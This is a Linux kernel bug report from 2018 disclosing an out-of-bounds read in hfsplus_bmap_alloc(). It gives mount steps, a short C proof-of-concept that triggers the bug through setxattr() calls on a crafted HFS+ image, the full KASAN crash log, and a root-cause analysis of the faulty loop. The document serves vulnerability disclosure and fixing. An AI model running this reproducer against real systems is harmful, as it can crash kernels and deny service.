Bug 200285 - Out-of-bound access in hfsplus_bmap_alloc() when calling setxattr() on a corrupted hfs+ image
Summary: Out-of-bound access in hfsplus_bmap_alloc() when calling setxattr() on a corrupted hfs+ image
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: HFS/HFSPLUS
Hardware: All Linux
: P1 normal
Assignee: fs_hfs@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-27 03:32 UTC by Wen Xu
Modified: 2018-06-27 03:32 UTC

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream)
2018-06-27 03:32 UTC, Wen Xu

Description Wen Xu 2018-06-27 03:32:25 UTC
Created attachment 276887
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 243.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

// derived from https://github.com/oracle/kernel-fuzzing/blob/master/include/mount.hh
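/*
 * Exercise the xattr syscalls on "<mpoint>/foo/bar/xattr".
 *
 * mpoint: mount point of the hfsplus image under test; must be non-NULL.
 *
 * The xattr calls themselves are deliberately unchecked: the reproducer
 * only needs them to reach the filesystem, and on a healthy image they are
 * expected to fail (the path need not exist). The one call that IS checked
 * is asprintf(), because on failure it leaves `xattr` unspecified and the
 * later calls would pass garbage as a path.
 */
static void activity(char *mpoint) {
  char *xattr = NULL;

  // asprintf() returns -1 on allocation failure.
  if (asprintf(&xattr, "%s/foo/bar/xattr", mpoint) < 0) {
    perror("asprintf");
    return;
  }

  // 113-byte all-zero value/list buffer, matching the reproducer's input.
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));

  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

  // asprintf() allocated the path with malloc(); the caller owns it.
  free(xattr);
}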

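/*
 * Entry point: argv[1] is the mount point of the image to exercise.
 *
 * Returns 0 after running the reproducer, 1 if no mount point was given.
 */
int main(int argc, char *argv[]) {
  // Without this check argv[1] is NULL and activity() would pass it to
  // asprintf(), which dereferences it.
  if (argc < 2) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}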

- Kernel message
[  177.089299] ==================================================================
[  177.090973] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x2f2/0x690
[  177.092451] Read of size 8 at addr ffff8801e2813170 by task poc/1408

[  177.094086] CPU: 0 PID: 1408 Comm: poc Not tainted 4.18.0-rc1+ #6
[  177.094094] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  177.094100] Call Trace:
[  177.094137]  dump_stack+0x7b/0xb5
[  177.094172]  print_address_description+0x70/0x290
[  177.094178]  kasan_report+0x291/0x390
[  177.094183]  ? hfsplus_bmap_alloc+0x2f2/0x690
[  177.094199]  __asan_load8+0x54/0x90
[  177.094205]  hfsplus_bmap_alloc+0x2f2/0x690
[  177.094210]  ? hfsplus_btree_write+0x1d0/0x1d0
[  177.094214]  ? save_stack+0xb5/0xd0
[  177.094218]  ? save_stack+0x46/0xd0
[  177.094221]  ? kasan_kmalloc+0xad/0xe0
[  177.094225]  ? __kmalloc+0x11f/0x240
[  177.094230]  ? hfsplus_find_init+0x54/0xc0
[  177.094235]  ? hfsplus_create_attr+0x10c/0x2b0
[  177.094239]  ? __hfsplus_setxattr+0x2d5/0x1160
[  177.094244]  ? hfsplus_setxattr+0x8a/0xb0
[  177.094247]  ? hfsplus_user_setxattr+0x27/0x30
[  177.094260]  ? __vfs_setxattr+0x7c/0xa0
[  177.094265]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.094269]  ? vfs_setxattr+0xb3/0xc0
[  177.094272]  ? setxattr+0x1b3/0x260
[  177.094276]  ? path_setxattr+0x134/0x170
[  177.094280]  ? __x64_sys_setxattr+0x6d/0x80
[  177.094302]  ? do_syscall_64+0x78/0x170
[  177.094318]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094324]  hfs_btree_inc_height+0xd3/0x450
[  177.094330]  ? hfs_bnode_split+0x6b0/0x6b0
[  177.094344]  ? char2uni+0x8f/0xf0
[  177.094349]  ? char2uni+0x50/0x50
[  177.094355]  hfsplus_brec_insert+0x679/0x6c0
[  177.094360]  ? hfsplus_brec_find+0xe0/0x2e0
[  177.094366]  ? hfsplus_brec_keylen+0x130/0x130
[  177.094370]  ? __kmalloc+0x11f/0x240
[  177.094376]  hfsplus_create_attr+0x263/0x2b0
[  177.094381]  ? hfsplus_attr_exists+0x140/0x140
[  177.094390]  ? hfsplus_find_init+0x54/0xc0
[  177.094399]  ? strncmp+0x3d/0xc0
[  177.094404]  __hfsplus_setxattr+0x2d5/0x1160
[  177.094426]  ? unwind_get_return_address+0x36/0x50
[  177.094432]  ? kasan_check_write+0x14/0x20
[  177.094437]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  177.094443]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  177.094447]  ? save_stack+0x46/0xd0
[  177.094451]  ? kasan_kmalloc+0xad/0xe0
[  177.094455]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.094460]  ? hfsplus_setxattr+0x4c/0xb0
[  177.094463]  ? hfsplus_user_setxattr+0x27/0x30
[  177.094467]  ? __vfs_setxattr+0x7c/0xa0
[  177.094471]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.094474]  ? vfs_setxattr+0xb3/0xc0
[  177.094478]  ? setxattr+0x1b3/0x260
[  177.094481]  ? path_setxattr+0x134/0x170
[  177.094485]  ? __x64_sys_setxattr+0x6d/0x80
[  177.094490]  ? do_syscall_64+0x78/0x170
[  177.094494]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094499]  ? save_stack+0xb5/0xd0
[  177.094502]  ? save_stack+0x46/0xd0
[  177.094505]  ? kasan_kmalloc+0xad/0xe0
[  177.094509]  ? __kmalloc_node+0x11e/0x2e0
[  177.094522]  ? kvmalloc_node+0x31/0x80
[  177.094526]  ? setxattr+0x114/0x260
[  177.094530]  ? path_setxattr+0x134/0x170
[  177.094534]  ? __x64_sys_setxattr+0x6d/0x80
[  177.094538]  ? do_syscall_64+0x78/0x170
[  177.094542]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094546]  ? save_stack+0xb5/0xd0
[  177.094549]  ? save_stack+0x46/0xd0
[  177.094553]  ? __kasan_slab_free+0x13c/0x1a0
[  177.094556]  ? kasan_slab_free+0xe/0x10
[  177.094560]  ? kmem_cache_free+0x89/0x1e0
[  177.094569]  ? putname+0x80/0x90
[  177.094573]  ? filename_lookup+0x191/0x280
[  177.094577]  ? kasan_unpoison_shadow+0x36/0x50
[  177.094581]  ? kasan_kmalloc+0xad/0xe0
[  177.094586]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.094591]  hfsplus_setxattr+0x8a/0xb0
[  177.094596]  hfsplus_user_setxattr+0x27/0x30
[  177.094600]  __vfs_setxattr+0x7c/0xa0
[  177.094605]  __vfs_setxattr_noperm+0x8d/0x200
[  177.094609]  vfs_setxattr+0xb3/0xc0
[  177.094614]  setxattr+0x1b3/0x260
[  177.094618]  ? vfs_setxattr+0xc0/0xc0
[  177.094621]  ? filename_lookup+0x191/0x280
[  177.094625]  ? filename_parentat+0x2b0/0x2b0
[  177.094630]  ? kasan_kmalloc+0xad/0xe0
[  177.094635]  ? kasan_check_write+0x14/0x20
[  177.094657]  ? strncpy_from_user+0xa8/0x1c0
[  177.094670]  ? __mnt_is_readonly.part.13+0x23/0x30
[  177.094676]  ? __mnt_want_write+0x9d/0xb0
[  177.094681]  path_setxattr+0x134/0x170
[  177.094685]  ? setxattr+0x260/0x260
[  177.094690]  __x64_sys_setxattr+0x6d/0x80
[  177.094695]  do_syscall_64+0x78/0x170
[  177.094701]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.094720] RIP: 0033:0x7fc353f381fa
[  177.094722] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  177.094785] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  177.094794] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa
[  177.094797] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0
[  177.094799] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000
[  177.094802] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20
[  177.094804] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000

[  177.095151] Allocated by task 1408:
[  177.095876]  save_stack+0x46/0xd0
[  177.095880]  kasan_kmalloc+0xad/0xe0
[  177.095884]  __kmalloc+0x11f/0x240
[  177.095888]  __hfs_bnode_create+0xc6/0x3f0
[  177.095892]  hfsplus_bnode_find+0x1f0/0x500
[  177.095896]  hfsplus_bmap_alloc+0x296/0x690
[  177.095900]  hfs_btree_inc_height+0xd3/0x450
[  177.095904]  hfsplus_brec_insert+0x679/0x6c0
[  177.095908]  hfsplus_create_attr+0x263/0x2b0
[  177.095913]  __hfsplus_setxattr+0x2d5/0x1160
[  177.095917]  hfsplus_setxattr+0x8a/0xb0
[  177.095924]  hfsplus_user_setxattr+0x27/0x30
[  177.095928]  __vfs_setxattr+0x7c/0xa0
[  177.095932]  __vfs_setxattr_noperm+0x8d/0x200
[  177.095935]  vfs_setxattr+0xb3/0xc0
[  177.095938]  setxattr+0x1b3/0x260
[  177.095941]  path_setxattr+0x134/0x170
[  177.095945]  __x64_sys_setxattr+0x6d/0x80
[  177.095949]  do_syscall_64+0x78/0x170
[  177.095953]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  177.096298] Freed by task 0:
[  177.096896] (stack is not available)

[  177.097952] The buggy address belongs to the object at ffff8801e2813100
                which belongs to the cache kmalloc-96 of size 96
[  177.100418] The buggy address is located 16 bytes to the right of
                96-byte region [ffff8801e2813100, ffff8801e2813160)
[  177.102812] The buggy address belongs to the page:
[  177.103793] page:ffffea00078a04c0 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0
[  177.105412] flags: 0x2ffff0000000100(slab)
[  177.106250] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500
[  177.107793] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[  177.109347] page dumped because: kasan: bad access detected

[  177.110784] Memory state around the buggy address:
[  177.111755]  ffff8801e2813000: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc
[  177.113212]  ffff8801e2813080: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc
[  177.114657] >ffff8801e2813100: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc
[  177.116099]                                                              ^
[  177.117488]  ffff8801e2813180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  177.118931]  ffff8801e2813200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  177.129577] ==================================================================
[  177.131051] Disabling lock debugging due to kernel taint
[  177.133614] general protection fault: 0000 [#1] SMP KASAN PTI
[  177.134841] CPU: 1 PID: 1408 Comm: poc Tainted: G    B             4.18.0-rc1+ #6
[  177.136473] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  177.138439] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690
[  177.139450] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff
[  177.143261] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286
[  177.144325] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08
[  177.145751] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8
[  177.147177] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499
[  177.148611] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100
[  177.150034] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00
[  177.151455] FS:  00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  177.153082] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  177.154236] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0
[  177.155667] Call Trace:
[  177.156187]  ? hfsplus_btree_write+0x1d0/0x1d0
[  177.157129]  ? save_stack+0xb5/0xd0
[  177.157850]  ? save_stack+0x46/0xd0
[  177.158571]  ? kasan_kmalloc+0xad/0xe0
[  177.159348]  ? __kmalloc+0x11f/0x240
[  177.160085]  ? hfsplus_find_init+0x54/0xc0
[  177.160937]  ? hfsplus_create_attr+0x10c/0x2b0
[  177.161844]  ? __hfsplus_setxattr+0x2d5/0x1160
[  177.162747]  ? hfsplus_setxattr+0x8a/0xb0
[  177.163562]  ? hfsplus_user_setxattr+0x27/0x30
[  177.164485]  ? __vfs_setxattr+0x7c/0xa0
[  177.165274]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.166196]  ? vfs_setxattr+0xb3/0xc0
[  177.166945]  ? setxattr+0x1b3/0x260
[  177.167663]  ? path_setxattr+0x134/0x170
[  177.168477]  ? __x64_sys_setxattr+0x6d/0x80
[  177.169342]  ? do_syscall_64+0x78/0x170
[  177.170147]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.171206]  hfs_btree_inc_height+0xd3/0x450
[  177.172087]  ? hfs_bnode_split+0x6b0/0x6b0
[  177.172947]  ? char2uni+0x8f/0xf0
[  177.173637]  ? char2uni+0x50/0x50
[  177.174327]  hfsplus_brec_insert+0x679/0x6c0
[  177.175203]  ? hfsplus_brec_find+0xe0/0x2e0
[  177.176063]  ? hfsplus_brec_keylen+0x130/0x130
[  177.176988]  ? __kmalloc+0x11f/0x240
[  177.177727]  hfsplus_create_attr+0x263/0x2b0
[  177.178601]  ? hfsplus_attr_exists+0x140/0x140
[  177.179511]  ? hfsplus_find_init+0x54/0xc0
[  177.180370]  ? strncmp+0x3d/0xc0
[  177.181040]  __hfsplus_setxattr+0x2d5/0x1160
[  177.181928]  ? unwind_get_return_address+0x36/0x50
[  177.182904]  ? kasan_check_write+0x14/0x20
[  177.183747]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  177.184688]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  177.185870]  ? save_stack+0x46/0xd0
[  177.186591]  ? kasan_kmalloc+0xad/0xe0
[  177.187363]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.188334]  ? hfsplus_setxattr+0x4c/0xb0
[  177.189156]  ? hfsplus_user_setxattr+0x27/0x30
[  177.190062]  ? __vfs_setxattr+0x7c/0xa0
[  177.190850]  ? __vfs_setxattr_noperm+0x8d/0x200
[  177.191772]  ? vfs_setxattr+0xb3/0xc0
[  177.192537]  ? setxattr+0x1b3/0x260
[  177.193259]  ? path_setxattr+0x134/0x170
[  177.194066]  ? __x64_sys_setxattr+0x6d/0x80
[  177.194923]  ? do_syscall_64+0x78/0x170
[  177.195711]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.196784]  ? save_stack+0xb5/0xd0
[  177.197503]  ? save_stack+0x46/0xd0
[  177.198221]  ? kasan_kmalloc+0xad/0xe0
[  177.198992]  ? __kmalloc_node+0x11e/0x2e0
[  177.199825]  ? kvmalloc_node+0x31/0x80
[  177.200606]  ? setxattr+0x114/0x260
[  177.201323]  ? path_setxattr+0x134/0x170
[  177.202127]  ? __x64_sys_setxattr+0x6d/0x80
[  177.202979]  ? do_syscall_64+0x78/0x170
[  177.203762]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.204828]  ? save_stack+0xb5/0xd0
[  177.205548]  ? save_stack+0x46/0xd0
[  177.206266]  ? __kasan_slab_free+0x13c/0x1a0
[  177.207139]  ? kasan_slab_free+0xe/0x10
[  177.208001]  ? kmem_cache_free+0x89/0x1e0
[  177.208854]  ? putname+0x80/0x90
[  177.209525]  ? filename_lookup+0x191/0x280
[  177.210366]  ? kasan_unpoison_shadow+0x36/0x50
[  177.211279]  ? kasan_kmalloc+0xad/0xe0
[  177.212057]  ? kmem_cache_alloc_trace+0x102/0x200
[  177.213034]  hfsplus_setxattr+0x8a/0xb0
[  177.213829]  hfsplus_user_setxattr+0x27/0x30
[  177.214709]  __vfs_setxattr+0x7c/0xa0
[  177.215470]  __vfs_setxattr_noperm+0x8d/0x200
[  177.216380]  vfs_setxattr+0xb3/0xc0
[  177.217104]  setxattr+0x1b3/0x260
[  177.217795]  ? vfs_setxattr+0xc0/0xc0
[  177.218552]  ? filename_lookup+0x191/0x280
[  177.219397]  ? filename_parentat+0x2b0/0x2b0
[  177.220285]  ? kasan_kmalloc+0xad/0xe0
[  177.221062]  ? kasan_check_write+0x14/0x20
[  177.221922]  ? strncpy_from_user+0xa8/0x1c0
[  177.222791]  ? __mnt_is_readonly.part.13+0x23/0x30
[  177.223771]  ? __mnt_want_write+0x9d/0xb0
[  177.224615]  path_setxattr+0x134/0x170
[  177.225393]  ? setxattr+0x260/0x260
[  177.226120]  __x64_sys_setxattr+0x6d/0x80
[  177.226949]  do_syscall_64+0x78/0x170
[  177.227710]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  177.228775] RIP: 0033:0x7fc353f381fa
[  177.229511] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  177.233310] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  177.234822] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa
[  177.236258] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0
[  177.237686] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000
[  177.239108] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20
[  177.240543] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000
[  177.241976] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  177.251777] ---[ end trace 7f5a46c7478f1295 ]---
[  177.252789] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690
[  177.253803] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff
[  177.257692] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286
[  177.258764] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08
[  177.260236] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8
[  177.261707] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499
[  177.263152] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100
[  177.264643] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00
[  177.266095] FS:  00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  177.267724] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  177.268944] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0

- Reason
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/btree.c#L391
             while (len) {
			byte = data[off];
			if (byte != 0xff) {
				for (m = 0x80, i = 0; i < 8; m >>= 1, i++) {
					if (!(byte & m)) {
						idx += i;
						data[off] |= m;
						set_page_dirty(*pagep);
						kunmap(*pagep);
						tree->free_nodes--;
						mark_inode_dirty(tree->inode);
						hfs_bnode_put(node);
						return hfs_bnode_create(tree,
							idx);
					}
				}
			}
			if (++off >= PAGE_SIZE) {
				kunmap(*pagep);
				data = kmap(*++pagep);
				off = 0;
			}
			idx += 8;
			len--;
		}

In this loop, at `byte = data[off];`, `off` lies outside the bounds of the `data` array. Note that the KASAN report above records an 8-byte read located 16 bytes past a 96-byte object allocated in `__hfs_bnode_create`; that size and location appear to match the page-pointer read at `*++pagep` walking past the end of the node's page array, with the later general protection fault consistent with `data[off]` then dereferencing the bogus mapping. Either way, the loop bound `len` is never checked against the number of pages the node actually holds, so a bounds check on the page index before advancing `pagep` would stop the walk.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
